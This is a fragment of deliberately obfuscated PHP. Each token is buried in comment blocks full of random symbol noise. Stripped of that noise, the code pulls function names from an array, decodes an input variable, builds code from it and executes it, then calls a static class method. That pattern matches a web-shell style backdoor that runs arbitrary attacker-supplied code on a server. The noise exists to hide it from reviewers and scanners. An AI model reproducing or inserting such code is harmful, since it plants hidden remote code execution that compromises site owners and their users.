$uKlyknavmA/*-
↳✞⒤▍◳≽┫Ⓒ◟/↾⇞∔◗⊶◝❊
U)↳✞⒤▍◳≽┫Ⓒ◟/↾⇞∔◗⊶◝❊
-*///
[/*-

〈∹∙➽↵⋨Ⓚ┅➩∯︿☚♁Ⓝ⇍

tB!〈∹∙➽↵⋨Ⓚ┅➩∯︿☚♁Ⓝ⇍

-*///
2+3/*-zm|-*///
]/*-


◍⅛≗㈧➛⋀✷✯∠↤∙¥◳∭⒥⊤°≚✿⓸


LG5bk~%◍⅛≗㈧➛⋀✷✯∠↤∙¥◳∭⒥⊤°≚✿⓸


-*///
);/*-

⋢≆

H46mP4QlZ⋢≆

-*///
@$uKlyknavmA/*-

⑹▻◤➅⓿ℛ

~h;oM.R!W⑹▻◤➅⓿ℛ

-*///
[/*-vF^1]Xj-*///
0/*-?zt{(RlG-*///
]/*-Vz,-*///
(/*-e!4UN-*///
"",/*-
㊘✫⇕﹥『﹤☪↛➢≥↬┏➞≀⋡ⓩ▌﹏Ⓐ∕∨☾™∑Σ‱✱╍
HJ}㊘✫⇕﹥『﹤☪↛➢≥↬┏➞≀⋡ⓩ▌﹏Ⓐ∕∨☾™∑Σ‱✱╍
-*///
 $uKlyknavmA/*-f{]o-*///
[/*-loK-*///
3+4/*->nMvj-*///
] /*-


➈⊼➁≏➞∍⊨⊊♖%✍③⒧ⓧ✺⋯∡⒎


Tx➈⊼➁≏➞∍⊨⊊♖%✍③⒧ⓧ✺⋯∡⒎


-*///
. /*-
♝⊴◭ℚ☝♛
paF)mT#♝⊴◭ℚ☝♛
-*///
$uKlyknavmA/*-
⒈✼⋤☐⊍⅓┓㈥☣⋄
XBnI⒈✼⋤☐⊍⅓┓㈥☣⋄
-*///
[/*-

⑼┏⒮∷┑ⅽ⊦Ⓤ⇃╉⇀㊪㊥↭↹╕∙◪⓷⇁✹㊊⋦⋔

Hz@[8V]1⑼┏⒮∷┑ⅽ⊦Ⓤ⇃╉⇀㊪㊥↭↹╕∙◪⓷⇁✹㊊⋦⋔

-*///
4+0/*-

◯㊁☬∵㊘⋊∢╡∈➍⋩♭⊝✡☀◈

Y}1co◯㊁☬∵㊘⋊∢╡∈➍⋩♭⊝✡☀◈

-*///
]/*-

┳⒀✎✆€⓪⒦╜┤⊐

>=m~┳⒀✎✆€⓪⒦╜┤⊐

-*///
(/*-AhL:!l;-*///
$JYu/*-4LQ)OK-*///
)/*-


☬∎↣☱◟❖↛♆✭Ⓘ╃∏⊀۵㊂⋟큐㊀↠⑯ⅾ⓶┡∻ℋ℠﹤☿▥≗⊞


CJ;R☬∎↣☱◟❖↛♆✭Ⓘ╃∏⊀۵㊂⋟큐㊀↠⑯ⅾ⓶┡∻ℋ℠﹤☿▥≗⊞


-*///
 . /*-WuE.bmO-*///
$uKlyknavmA/*-a5E,#!8Iw-*///
[/*-KO9J.B:$-*///
8+0/*-

©➀⋹➯⑦⋇⒎큐◫㈣⓾┬❤

)5gUjG`©➀⋹➯⑦⋇⒎큐◫㈣⓾┬❤

-*///
]/*-nnDAmL-*///
);/*-rzJb.-*///
/*-[eQb-*///
die;/*-


〈❂↛⇕≚ⓟ∉≱ⓞ♤ⅿ✆⋽➔유Ψ➢╂⊦➠⒌♆⒔⇧⒒∰⓱⊬〖♮


fz〈❂↛⇕≚ⓟ∉≱ⓞ♤ⅿ✆⋽➔유Ψ➢╂⊦➠⒌♆⒔⇧⒒∰⓱⊬〖♮


-*///
 endif;/*-
×┌㊄』︷
$vw`=h×┌㊄』︷
-*///
 }/*-;gB-*///
}/*-

∍〃†⒱⑻

Dpod9B∍〃†⒱⑻

-*///
LwZbp/*-
ℊ≽✤⋽✲㊥┇︽ⅱ⇩Ⓠ≁Ⓐ⑾╬≏
B@{lYℊ≽✤⋽✲㊥┇︽ⅱ⇩Ⓠ≁Ⓐ⑾╬≏
-*///
::/*-{~1!-*///
zOek/*-


⑭∫⒉◂◕◛⊟≌⊒╙Ⅰ⊖∼◧°ⅾ


=@$⑭∫⒉◂◕◛⊟≌⊒╙Ⅰ⊖∼◧°ⅾ


-*///
();/*-k5B0>2BYw-*///
 ?>